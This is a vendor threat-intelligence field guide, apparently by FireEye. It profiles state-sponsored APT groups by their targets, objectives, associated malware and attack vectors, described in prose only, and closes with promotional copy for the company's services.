Advanced Persistent Threat Groups

A field guide to state-sponsored cyber attackers, who they target and how they operate

FireEye tracks cyber attackers all over the world. But we pay special attention to attackers who carry out advanced persistent threats (APT) attacks.

APT attackers receive direction and support from an established nation state. Whether their mission is to steal data, disrupt operations or destroy infrastructure, these threat actors tenaciously pursue their goal using a wide range of tools and tactics.

Unlike most cyber criminals, APT attackers pursue their objectives over an extended period of time, typically months or years. They adapt to organizations’ efforts to eradicate them, frequently changing their attack vectors or malware payloads. And they frequently return to the same victim multiple times after being ejected from a network.

The presence of an APT-linked malware variant in your system does not always mean that you are in the crosshairs of an APT attacker. Other cyber criminals use APT-linked malware as well.

Identifying who introduced malware into your system usually requires more contextual intelligence. Still, your security team should pay close attention when their security tools detect malware linked to previous APT attacks.

This page highlights nine of the most active APT families, all of which are still active across the cyber threat landscape.

Blog

APT33: New Cyber Espionage Group

APT Groups

APT33 | APT32 | APT30 | APT29 | APT28 | APT18 | APT17 | APT12 | APT5 | APT3 | APT1

APT33

First known appearance: 2013

Threat Actors: Iranian government and has possible ties to the Islamic Revolutionary Guard Corps (IRGC)

Targets: Aerospace and Energy sectors

Objectives: APT33’s targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests, implying that the threat actor is most likely government sponsored.

Overview: APT33 has targeted organizations, spanning multiple industries, headquartered in the United States, Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production.

Associated malware: SHAPESHIFT, DROPSHOT, TURNEDUP, NANOCORE, NETWIRE, ALFA Shell 

Typical attack vectors: APT33 sent spear-phishing emails to employees whose jobs related to the aviation industry. These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individuals. (An example .hta file excerpt is provided in Figure 2.) To the user, the file would appear as benign references to legitimate job postings. However, unbeknownst to the user, the .hta file also contained embedded JavaScript code which automatically downloaded a custom APT33 backdoor. 

APT32

Also Known as: OceanLotus Group

First known appearance: 2014

Threat Actors: Vietnamese government (suspected)

Targets: Foreign companies investing in Vietnam’s manufacturing, consumer products, consulting and hospitality sectors.

Objective: To gain advantage over global companies doing business in Vietnam.

Overview: Recent activity targeting private interests in Vietnam suggests that APT32 poses a threat to companies doing business, manufacturing or preparing to invest in the country. While the specific motivation for this activity remains opaque, it could ultimately erode the competitive advantage of targeted organizations.

In addition to targeting of the private sector, this activity represents a threat to civil society and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora could all be targeted. Although targeting of the military and defense industrial base has not yet been identified, the extension of APT32 capabilities in that direction should be anticipated.

Associated malware: SOUNDBITE, WINDSHIELD, PHOREAL, BEACON, KOMPROGO

Typical attack vectors: APT32 actors leverage ActiveMime files that employ social engineering methods to entice the victim into enabling macros. Upon execution, the initialized file typically downloads multiple malicious payloads from a remote server. APT32 actors delivers the malicious attachments via spearphishing emails. Evidence has shown that some may have been sent via Gmail.

APT32 actors design multilingual lure files that contain malicious macros and are tailored to specific victims. These files are created by exporting Word documents into single file web pages. Although the files have “.doc” extensions, they are ActiveMime “.mht” web page archives that contain text, images and macros.

apt32-map

Further reading

APT30

First known appearance: 2004

Threat Actors: Communist Party of China, Chinese People’s Liberation Army

Targets: Members of the Association of Southeast Asian Nations (ASEAN)

Objective: To steal sensitive political, economic and military information about the region for government espionage.

Overview: APT30 is noted not only for sustained activity over a long period of time but also for successfully modifying and adapting source code to maintain the same tools, tactics and infrastructure since at least 2005. Evidence shows that the group prioritizes targets, most likely works in shifts in a collaborative environment and builds malware from a coherent development plan. The group has had the capability to infect air-gapped networks since 2005. Altogether, these signs indicate that APT30 is most likely a state-sponsored threat group funded and supported by the Chinese government.

Associated malware: Backspace, Neteagle, Shipshape, Spaceship, Flashflood and many others, including droppers, downloaders and backdoors

Typical attack vectors: APT30 uses a suite of tools that includes downloaders, backdoors, a central controller and several components designed to infect removable drives and cross air-gapped networks to steal data. APT30 frequently registers its own DNS domains for malware CnC activities.

Its malware uses version control and a consistent methodology (a set of mutexes and events) to manage malware execution and ensure that only a single copy of a given piece of malware is running at any given time, most likely to decrease the chances of detection. APT30 backdoors commonly use a two-stage CnC process whereby victim hosts contact an initial CnC server to determine whether they should connect to the attackers’ main controller. The controller uses a GUI that allows operators to prioritize hosts, add notes to victims and set alerts for when certain hosts come online. Finally, an unused dialog box in the controller provides a login prompt for the current “attendant.”

APT29

First known appearance: 2014

Threat Actors: Russian government (suspected)

Targets: Western European governments, foreign policy groups and other organizations with valuable information for Russia (reported)

Objective: Not disclosed.

Overview: APT29 is an adaptive and disciplined threat group that hides its activity on a victim’s network, communicating infrequently and in a way that closely resembles legitimate traffic. By using legitimate popular web services, the group can also take advantage of encrypted SSL connections, making detection even more difficult. APT29 is one of the most evolved and capable threat groups. It deploys new backdoors to fix its own bugs and add features. It monitors network defender activity to maintain control over systems. APT29 uses only compromised servers for CnC communication. It counters attempts to remediate attacks. It also maintains a fast development cycle for its malware, quickly altering tools to hinder detection.

Associated malware: Hammertoss, Uploader, tDiscoverer

Typical attack vectors: APT29 uses social media sites such as Twitter or GitHub, as well as cloud storage services, to relay commands and extract data from compromised networks. The group relays commands via images containing hidden and encrypted data. Information is extracted from a compromised network and files are uploaded to cloud storage services.

APT28

Also known as: Sofacy Group

First known appearance: 2007

Threat Actors: Russian government

Targets: The Caucasus, particularly Georgia, eastern European countries and militaries, North Atlantic Treaty Organization (NATO) and other European security organizations and defense firms

Objective: To gain insider information related to governments, militaries and security organizations.

Overview: APT28 is a skilled team of developers and operators collecting intelligence on defense and geopolitical issues—intelligence that would be useful only to a government. This APT group compiles malware samples with Russian language settings during working hours (8 a.m. to 6 p.m.), consistent with the time zone of Russia’s major cities, including Moscow and St. Petersburg. This suggests that APT28 receives direct ongoing financial and other resources from a well-established organization, most likely the Russian government.

Associated malware: Chopstick, Sourface

Typical attack vectors: Tools commonly used by APT28 include the Sourface downloader, its second-stage backdoor Eviltoss and a modular family of implants dubbed Chopstick. APT28 has employed RSA encryption to protect files and stolen information moved from the victim’s network to the controller. It has also made incremental and systematic changes to the Sourface downloader and its surrounding ecosystem since 2007, indicating a long-standing and dedicated development effort.

APT18

Also known as: Dynamite Panda, Wekby, TG-0416

First known appearance: 2010

Threat Actors: People’s Republic of China (suspected)

Targets: Aerospace, defense and engineering sectors along with, more recently, healthcare, pharmaceutical and medical device companies

Objective: To steal IP related to technologies, processes and expertise

Overview: APT18 was responsible for a major data breach at Community Health Systems (CHS). Very little information about APT18 has been released into the public domain.

Associated malware: Gh0st remote access Trojan (RAT)

Typical attack vectors: APT18 attackers exploited the “Heartbleed” bug in a virtual private network (VPN) server within the CHS network, throwing thousands of messages at the server until it was able to gain access.

APT17

Also known as: DeputyDog

First known appearance: 2013

Threat Actors: Communist Party of China, Chinese People’s Liberation Army

Targets: U.S. government entities, the defense industry, law firms, information technology companies, mining companies and non-governmental organizations

Objective: To steal military intelligence.

Overview: Confident in its resources and skills, APT17 demonstrates the increasing use of public websites to hide attacks in plain sight. It loads malicious software directly into a computer's memory in a way that bypasses the hard drive, making it more difficult for companies to use traditional forensic and scanning techniques to identify compromised computers.

APT17 uses Blackcoffee malware as part of the first stage of its attacks. Blackcoffee functionality includes uploading and downloading files; creating a reverse shell; enumerating files and processes; renaming, moving and deleting files; terminating processes; and expanding its functionality by adding new backdoor commands.

Associated malware: Blackcoffee

Typical attack vectors: APT17 embedded the encoded CnC IP address for the Blackcoffee malware in legitimate Microsoft TechNet profile pages and forum threads. Encoding the IP address made it more difficult to identify the true CnC address. APT17 used Blackcoffee variants to masquerade malicious communication as normal web traffic by disguising the CnC communication as queries to web search engines.

APT12

Also known as: Ixeshe, DynCalc, DNSCalc, “Darwin’s favorite APT group”

First known appearance: 2012

Threat Actors: People’s Republic of China, China People’s Liberation Army

Targets: Western journalists, U.S. military contractors, Taiwanese and Japanese governments and Japanese technology companies, especially satellite and crypto technology firms

Objective: To maintain surveillance on media outlets that could impact the reputation of Chinese leaders and to collect intelligence on military technology companies in the United States, Japan and Taiwan.

Overview: More clandestine, discriminating and skilled than many other groups operating out of China, APT12 primarily targets journalists and military contractors from the United States and Pacific Rim. APT12 specializes in gathering highly specific information of interest to the Chinese government and military. APT12 follows news about itself and modifies its tools and techniques accordingly.

Associated malware: Riptide, Hightide, Threebyte, Waterspout

Typical attack vectors: APT12 typically uses spear phishing as its primary delivery method, sending emails that contain malicious links or attachments to employees of the targeted organization. If someone takes the bait, APT12 then installs multiple backdoors such as RIPTIDE.

RIPTIDE is a proxy-aware backdoor that communicates via HTTP to a hard-coded command-and-control (CnC) server. RIPTIDE’s first communication with its CnC server fetches an RC4 encryption key, which is used to encrypt all further communication. APT12 typically then installs custom software and remote access tools to search for and siphon targeted data.

APT5

First known appearance: 2005

Threat Actors: Undisclosed

Targets: Telecommunications and technology companies, particularly in Southeast Asia, as well as high-tech manufacturing firms and military application technology

Objective: To steal emails, procurement bids and proposals, documents on unmanned aerial vehicles (UAVs) and proprietary product specifications.

Overview: APT5 appears to be a large threat group that consists of several subgroups. It tends to focus on (satellite) telecommunications and technology companies based primarily in Southeast Asia. It steals information such as pricing data, contract negotiations, inventories and product deployment data

Associated malware: Leouncia

Typical attack vectors: APT5 often uses malware with keylogging capabilities to specifically target telecommunication companies' corporate networks, employees and executives.

APT3

Also known as: UPS

First known appearance: 2014

Threat Actors: Undisclosed (based in China)

Targets: Companies in the energy, aerospace and defense, construction and engineering, high-tech, telecommunications and transportation sectors

Objective: Undisclosed

Overview: APT3 leverages zero-day vulnerabilities in widespread but infrequent phishing campaigns. The recent use of known exploits, social engineering and more frequent attacks implies a possible shift in strategy and possibly a lack of access to further zero-day exploits. Regardless, APT3 has been identified as the main actor behind a major attack campaign called Operation Clandestine Fox.

Associated malware: Shotput, CookieCutter, PlugX/Sogu

Typical attack vectors: APT3 is primarily known for sending out spear-phishing messages that contain a compressed executable attachment. The attackers leveraged multiple exploits to target CVE-2014-6332 and CVE-2014-4113.

APT1

Also known as: Comment Crew, Comment Group

First known appearance: 2006

Threat Actors: Communist Party of China, Chinese People’s Liberation Army Unit 6138

Targets: Corporations across a broad range of industries in English-speaking countries

Objective: To steal broad categories of intellectual property (IP), including technology blueprints, proprietary manufacturing processes, test results, business plans, pricing documents, partnership agreements, emails and contact lists.

Overview: APT1 has systematically stolen hundreds of terabytes of data from at least 141 organizations spanning 20 major industries. APT1 specifically targets industries that China identifies as strategic in its five-year plan. Once APT1 has established access to a network, it periodically revisits that network over months or years.

Associated malware: Trojan Ecltys, Backdoor, Barkiofork, Backdoor. Wakeminap, Trojan.Downbot, Backdoor.Dalbot. Backdoor.Revird, Trojan.Badname, Backdoor.Wualess.

Typical attack vectors: APT1 uses spear-phishing attacks or backdoors to gain a foothold and then uses publically available tools to escalate privileges. Employing built-in operating system commands, APT1 then explores the compromised system and its network environment. Files of interest are packed into archives and sent back to China via file transfer protocol (FTP).

Conclusion

Although informative, this document cannot substitute for thorough intelligence gathering efforts and investigation of suspected cyber attacks.

Over the last decade, FireEye has spent over 100,000 hours per year responding to the world’s largest and most consequential breaches. This deep incident response experience, gathered from six worldwide security operation centers (SOCs), is curated and fed back into a self-learning, symbiotic security ecosystem that includes over 11 million sensors and is updated every 60 minutes.

FireEye experts, assisted by this ecosystem, track a growing collection of 30+ advanced threat actors and 300+ advanced malware families. They also maintain profiles of 10+ nation-state threat sponsors and 40+ targeted industries to track and analyze financial and political dimensions of cyber threats worldwide. FireEye experts can not only determine the risk associated with a validated threat, but also how the threat got into the environment, how it spread and what can and should be done about it. These insights are delivered as contextual intelligence that helps client organizations quickly prioritize and effectively respond to critical sophisticated threats.

Further reading: Threat Intelligence Reports